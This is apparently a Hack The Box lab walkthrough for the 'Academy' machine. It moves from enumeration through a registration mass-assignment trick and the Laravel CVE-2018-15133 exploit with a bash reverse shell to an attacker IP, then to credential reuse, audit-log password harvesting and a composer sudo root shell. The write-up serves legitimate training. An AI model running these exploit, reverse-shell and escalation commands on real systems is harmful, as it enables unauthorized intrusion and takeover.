HTB Academy done
Academy
Notes
OS:
Linux
Technology:
MySQL
Laravel
IP Address:
10.129.1.78
Open ports:
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
33060/tcp open mysqlx MySQL X protocol listener
Users and pass:
From website: http://academy.htb/admin-page.php
cry0l1t3
mrb3n
---
From website: http://dev-staging-01.academy.htb/
DB_HOST "127.0.0.1"
DB_PORT "3306"
DB_DATABASE "homestead"
DB_USERNAME "homestead"
DB_PASSWORD "secret"
---
From file: /var/www/html/academy
DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_DATABASE=academy
DB_USERNAME=dev
DB_PASSWORD=mySup3rP4s5w0rd!!
---
SSH login:
cry0l1t3
mySup3rP4s5w0rd!!
---
From command aureport --tty (read log /var/log/audit)
L: mrb3n
P: mrb3n_Ac@d3my!
---
Nmap
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Academy]
└─$ sudo nmap -A -sV --script=default -p- -oA 10.129.1.78_nmap 10.129.1.78 ; cat 10.129.1.78_nmap.nmap | grep -E "^[0-9]{1,}/(tcp|udp)"
[sudo] password for kali:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-18 12:16 CET
Nmap scan report for 10.129.1.78
Host is up (0.033s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 c0:90:a3:d8:35:25:6f:fa:33:06:cf:80:13:a0:a5:53 (RSA)
| 256 2a:d5:4b:d0:46:f0:ed:c9:3c:8d:f6:5d:ab:ae:77:96 (ECDSA)
|_ 256 e1:64:14:c3:cc:51:b2:3b:a6:28:a7:b1:ae:5f:45:35 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Did not follow redirect to http://academy.htb/
|_http-server-header: Apache/2.4.41 (Ubuntu)
33060/tcp open mysqlx MySQL X protocol listener
Add IP to /etc/hosts
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Academy]
└─$ cat /etc/hosts | tail -n1
10.129.1.78 academy.htb
Ffuz
──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Academy]
└─$ ffuf -u http://10.129.1.78/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -recursion -recursion-depth=2 -o 10.129.1.78_ffuz -of all -e .php,.html,.txt,.bac,.backup,.md,.git
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.129.1.78/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Extensions : .php .html .txt .bac .backup .md .git
:: Output file : 10.129.1.78_ffuz.{json,ejson,html,md,csv,ecsv}
:: File format : all
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
academy [Status: 301, Size: 312, Words: 20, Lines: 10, Duration: 30ms]
[INFO] Adding a new job to the queue: http://10.129.1.78/academy/FUZZ
index.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 62ms]
[INFO] Starting queued job on target: http://10.129.1.78/academy/FUZZ
app [Status: 301, Size: 316, Words: 20, Lines: 10, Duration: 37ms]
[INFO] Adding a new job to the queue: http://10.129.1.78/academy/app/FUZZ
composer [Status: 200, Size: 1512, Words: 470, Lines: 61, Duration: 30ms]
config [Status: 301, Size: 319, Words: 20, Lines: 10, Duration: 36ms]
[INFO] Adding a new job to the queue: http://10.129.1.78/academy/config/FUZZ
database [Status: 301, Size: 321, Words: 20, Lines: 10, Duration: 30ms]
[INFO] Adding a new job to the queue: http://10.129.1.78/academy/database/FUZZ
package [Status: 200, Size: 1150, Words: 188, Lines: 23, Duration: 37ms]
public [Status: 301, Size: 319, Words: 20, Lines: 10, Duration: 34ms]
[INFO] Adding a new job to the queue: http://10.129.1.78/academy/public/FUZZ
readme [Status: 200, Size: 3622, Words: 289, Lines: 60, Duration: 36ms]
readme.md [Status: 200, Size: 3622, Words: 289, Lines: 60, Duration: 38ms]
resources [Status: 301, Size: 322, Words: 20, Lines: 10, Duration: 38ms]
[INFO] Adding a new job to the queue: http://10.129.1.78/academy/resources/FUZZ
routes [Status: 301, Size: 319, Words: 20, Lines: 10, Duration: 39ms]
[INFO] Adding a new job to the queue: http://10.129.1.78/academy/routes/FUZZ
server.php [Status: 200, Size: 2117, Words: 890, Lines: 77, Duration: 43ms]
storage [Status: 301, Size: 320, Words: 20, Lines: 10, Duration: 37ms]
[INFO] Adding a new job to the queue: http://10.129.1.78/academy/storage/FUZZ
tests [Status: 301, Size: 318, Words: 20, Lines: 10, Duration: 42ms]
[INFO] Adding a new job to the queue: http://10.129.1.78/academy/tests/FUZZ
vendor [Status: 301, Size: 319, Words: 20, Lines: 10, Duration: 34ms]
[INFO] Adding a new job to the queue: http://10.129.1.78/academy/vendor/FUZZ
[INFO] Starting queued job on target: http://10.129.1.78/academy/app/FUZZ
[INFO] Starting queued job on target: http://10.129.1.78/academy/config/FUZZ
app.php [Status: 500, Size: 0, Words: 1, Lines: 1, Duration: 47ms]
auth.php [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 32ms]
cache.php [Status: 500, Size: 0, Words: 1, Lines: 1, Duration: 35ms]
database.php [Status: 500, Size: 0, Words: 1, Lines: 1, Duration: 32ms]
logging.php [Status: 500, Size: 0, Words: 1, Lines: 1, Duration: 41ms]
mail.php [Status: 500, Size: 0, Words: 1, Lines: 1, Duration: 41ms]
queue.php [Status: 500, Size: 0, Words: 1, Lines: 1, Duration: 61ms]
services.php [Status: 500, Size: 0, Words: 1, Lines: 1, Duration: 38ms]
session.php [Status: 500, Size: 0, Words: 1, Lines: 1, Duration: 43ms]
view.php [Status: 500, Size: 0, Words: 1, Lines: 1, Duration: 35ms]
[INFO] Starting queued job on target: http://10.129.1.78/academy/database/FUZZ
seeds [Status: 301, Size: 327, Words: 20, Lines: 10, Duration: 49ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.1.78/academy/database/seeds/
[INFO] Starting queued job on target: http://10.129.1.78/academy/public/FUZZ
admin.php [Status: 200, Size: 2633, Words: 668, Lines: 142, Duration: 53ms]
config.php [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 38ms]
home.php [Status: 302, Size: 55034, Words: 4001, Lines: 1050, Duration: 46ms]
images [Status: 301, Size: 326, Words: 20, Lines: 10, Duration: 71ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.1.78/academy/public/images/
index.php [Status: 200, Size: 2117, Words: 890, Lines: 77, Duration: 129ms]
login.php [Status: 200, Size: 2627, Words: 667, Lines: 142, Duration: 40ms]
register.php [Status: 200, Size: 3003, Words: 801, Lines: 149, Duration: 36ms]
[INFO] Starting queued job on target: http://10.129.1.78/academy/resources/FUZZ
assets [Status: 301, Size: 329, Words: 20, Lines: 10, Duration: 52ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.1.78/academy/resources/assets/
lang [Status: 301, Size: 327, Words: 20, Lines: 10, Duration: 45ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.1.78/academy/resources/lang/
views [Status: 301, Size: 328, Words: 20, Lines: 10, Duration: 59ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.1.78/academy/resources/views/
[INFO] Starting queued job on target: http://10.129.1.78/academy/routes/FUZZ
api.php [Status: 500, Size: 0, Words: 1, Lines: 1, Duration: 47ms]
channels.php [Status: 500, Size: 0, Words: 1, Lines: 1, Duration: 104ms]
console.php [Status: 500, Size: 0, Words: 1, Lines: 1, Duration: 52ms]
web.php [Status: 500, Size: 0, Words: 1, Lines: 1, Duration: 62ms]
[INFO] Starting queued job on target: http://10.129.1.78/academy/storage/FUZZ
app [Status: 301, Size: 324, Words: 20, Lines: 10, Duration: 38ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.1.78/academy/storage/app/
framework [Status: 301, Size: 330, Words: 20, Lines: 10, Duration: 51ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.1.78/academy/storage/framework/
logs [Status: 301, Size: 325, Words: 20, Lines: 10, Duration: 53ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.1.78/academy/storage/logs/
[INFO] Starting queued job on target: http://10.129.1.78/academy/tests/FUZZ
[INFO] Starting queued job on target: http://10.129.1.78/academy/vendor/FUZZ
autoload.php [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 140ms]
bin [Status: 301, Size: 323, Words: 20, Lines: 10, Duration: 34ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.1.78/academy/vendor/bin/
composer [Status: 301, Size: 328, Words: 20, Lines: 10, Duration: 71ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.1.78/academy/vendor/composer/
league [Status: 301, Size: 326, Words: 20, Lines: 10, Duration: 38ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.1.78/academy/vendor/league/
psy [Status: 301, Size: 323, Words: 20, Lines: 10, Duration: 32ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.1.78/academy/vendor/psy/
symfony [Status: 301, Size: 327, Words: 20, Lines: 10, Duration: 54ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.1.78/academy/vendor/symfony/
:: Progress: [163752/163752] :: Job [11/11] :: 1063 req/sec :: Duration: [0:03:21] :: Errors: 0 ::
Nikto
I found info about vuln in admin.php (CVE-2006-5412)
---
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Academy]
└─$ nikto -host http://academy.htb | tee academy.htb_nikto
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 10.129.1.78
+ Target Hostname: academy.htb
+ Target Port: 80
+ Start Time: 2025-03-18 12:25:07 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.41 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /login.php: Cookie PHPSESSID created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /config.php: PHP Config file may contain database IDs and passwords.
+ /admin.php?en_log_id=0&action=config: EasyNews version 4.3 allows remote admin access. This PHP file should be protected. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5412
+ /admin.php?en_log_id=0&action=users: EasyNews version 4.3 allows remote admin access. This PHP file should be protected. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5412
+ /admin.php: This might be interesting.
+ /login.php: Admin login page/section found.
+ 7962 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time: 2025-03-18 12:30:30 (GMT1) (323 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Create a admin user
I change roleid from 0 to 1
---
POST /register.php HTTP/1.1
Host: academy.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 67
Origin: http://academy.htb
Connection: keep-alive
Referer: http://academy.htb/register.php
Cookie: PHPSESSID=14so4ccoh43rgifl8f676elbcm
Upgrade-Insecure-Requests: 1
Priority: u=0, i
uid=haker&password=%23Qwerty123%23&confirm=%23Qwerty123%23&roleid=1
Login as admin user - haker
http://academy.htb/admin-page.php
Interesting info: Complete initial set of modules (cry0l1t3 / mrb3n)
Add a new hostname to /etc/hosts
dev-staging-01.academy.htb
---
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Academy]
└─$ cat /etc/hosts | tail -n1
10.129.1.78 academy.htb dev-staging-01.academy.htb
Find errors page: dev-staging-01.academy.htb
I found more interesing info, below more details:
DB_CONNECTION "mysql"
DB_HOST "127.0.0.1"
DB_PORT "3306"
DB_DATABASE "homestead"
DB_USERNAME "homestead"
DB_PASSWORD "secret"
___
APP_NAME "Laravel"
APP_ENV "local"
APP_KEY "base64:dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0="
Find exploit: CVE-2018-15133
https://github.com/aljavier/exploit_laravel_cve-2018-15133
Run exploit - create revshell
┌──(.venv)─(kali㉿kali)-[~/…/writeups/HTB/HTB_Academy/exploit_laravel_cve-2018-15133]
└─$ python3 pwn_laravel.py http://dev-staging-01.academy.htb "dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=" -c "bash -c 'exec bash -i &>/dev/tcp/10.10.14.48/80 <&1'"
---
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Academy/exploit_laravel_cve-2018-15133]
└─$ netcat -lvnp 80
listening on [any] 80 ...
connect to [10.10.14.48] from (UNKNOWN) [10.129.1.78] 52840
bash: cannot set terminal process group (1143): Inappropriate ioctl for device
bash: no job control in this shell
www-data@academy:/var/www/html/htb-academy-dev-01/public$ cd /home
cd /home
www-data@academy:/home$ ls -a
ls -a
.
..
21y4d
ch4p
cry0l1t3
egre55
g0blin
mrb3n
www-data@academy:/home$
Read .env
I found a new creds for mysql DB
---
www-data@academy:/var/www/html/academy$ cat .env | grep DB
cat .env | grep DB
DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_DATABASE=academy
DB_USERNAME=dev
DB_PASSWORD=mySup3rP4s5w0rd!!
www-data@academy:/var/www/html/academy$
Read flag: user.txt
www-data@academy:/var/www/html/academy$ cd /home
cd /home
www-data@academy:/home$ ls
ls
21y4d
ch4p
cry0l1t3
egre55
g0blin
mrb3n
www-data@academy:/home$ su cry0l1t3
su cry0l1t3
Password: mySup3rP4s5w0rd!!
id
uid=1002(cry0l1t3) gid=1002(cry0l1t3) groups=1002(cry0l1t3),4(adm)
cd ~
ls -a
.
..
.bash_history
.bash_logout
.bashrc
.cache
.local
.profile
user.txt
cat user.txt
5cd9e79d0baae192db5be242df0e0cff
Read logs /var/log/audit/
User can read logs because he has adm group
___
cry0l1t3@academy:~$ id
id
uid=1002(cry0l1t3) gid=1002(cry0l1t3) groups=1002(cry0l1t3),4(adm)
cry0l1t3@academy:~$
---
Run command aureport --tty and I see password for user mrb3n (guess)
___
cry0l1t3@academy:~$ aureport --tty
aureport --tty
TTY Report
===============================================
# date time event auid term sess comm data
===============================================
Error opening config file (Permission denied)
NOTE - using built-in logs: /var/log/audit/audit.log
1. 08/12/2020 02:28:10 83 0 ? 1 sh "su mrb3n",<nl>
2. 08/12/2020 02:28:13 84 0 ? 1 su "mrb3n_Ac@d3my!",<nl>
3. 08/12/2020 02:28:24 89 0 ? 1 sh "whoami",<nl>
4. 08/12/2020 02:28:28 90 0 ? 1 sh "exit",<nl>
5. 08/12/2020 02:28:37 93 0 ? 1 sh "/bin/bash -i",<nl>
...
...
...
Login as user: mrb3n
L: mrb3n
P: mrb3n_Ac@d3my!
---
cry0l1t3@academy:~$ su mrb3n
su mrb3n
Password: mrb3n_Ac@d3my!
$ id
id
uid=1001(mrb3n) gid=1001(mrb3n) groups=1001(mrb3n)
$
$ sudo -i
sudo -i
[sudo] password for mrb3n: mrb3n_Ac@d3my!
Sorry, user mrb3n is not allowed to execute '/bin/bash' as root on academy.
$ sudo -l
sudo -l
[sudo] password for mrb3n: mrb3n_Ac@d3my!
Matching Defaults entries for mrb3n on academy:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User mrb3n may run the following commands on academy:
(ALL) /usr/bin/composer
$
Privilege Escalation: /usr/bin/composer
https://gtfobins.github.io/gtfobins/composer/#sudo
---
$ TF=$(mktemp -d)
TF=$(mktemp -d)
$ echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
$ sudo composer --working-dir=$TF run-script x
sudo composer --working-dir=$TF run-script x
PHP Warning: PHP Startup: Unable to load dynamic library 'mysqli.so' (tried: /usr/lib/php/20190902/mysqli.so (/usr/lib/php/20190902/mysqli.so: undefined symbol: mysqlnd_global_stats), /usr/lib/php/20190902/mysqli.so.so (/usr/lib/php/20190902/mysqli.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
PHP Warning: PHP Startup: Unable to load dynamic library 'pdo_mysql.so' (tried: /usr/lib/php/20190902/pdo_mysql.so (/usr/lib/php/20190902/pdo_mysql.so: undefined symbol: mysqlnd_allocator), /usr/lib/php/20190902/pdo_mysql.so.so (/usr/lib/php/20190902/pdo_mysql.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
Do not run Composer as root/super user! See https://getcomposer.org/root for details
> /bin/sh -i 0<&3 1>&3 2>&3
#
# id
id
uid=0(root) gid=0(root) groups=0(root)
Read flag: root.txt
# cd /root/
cd /root/
#
# ls -a
ls -a
. .bash_history .composer root.txt .ssh
.. .bashrc .local .selected_editor .viminfo
academy.txt .cache .profile snap .wget-hsts
#
# cat academy.txt
cat academy.txt
██╗ ██╗████████╗██████╗ █████╗ ██████╗ █████╗ ██████╗ ███████╗███╗ ███╗██╗ ██╗
██║ ██║╚══██╔══╝██╔══██╗ ██╔══██╗██╔════╝██╔══██╗██╔══██╗██╔════╝████╗ ████║╚██╗ ██╔╝
███████║ ██║ ██████╔╝ ███████║██║ ███████║██║ ██║█████╗ ██╔████╔██║ ╚████╔╝
██╔══██║ ██║ ██╔══██╗ ██╔══██║██║ ██╔══██║██║ ██║██╔══╝ ██║╚██╔╝██║ ╚██╔╝
██║ ██║ ██║ ██████╔╝ ██║ ██║╚██████╗██║ ██║██████╔╝███████╗██║ ╚═╝ ██║ ██║
╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚═════╝ ╚══════╝╚═╝ ╚═╝ ╚═╝
We've been hard at work.
Check out our brand new training platform, Hack the Box Academy!
https://academy.hackthebox.eu/
Register an account and browse our initial list of courses!
_.-'`'-._
.-' _ '-.
`-.__ `\_.-'
| `-``\|
`-.....-H
T
B
#
# cat root.txt
cat root.txt
18a8f4e53a7975259d1388ba8d5591db
#
References
[Laravel exploit for CVE-2018-15133](https://github.com/aljavier/exploit_laravel_cve-2018-15133)
[GTFOBins - composer](https://gtfobins.github.io/gtfobins/composer/#sudo)
Lessons Learned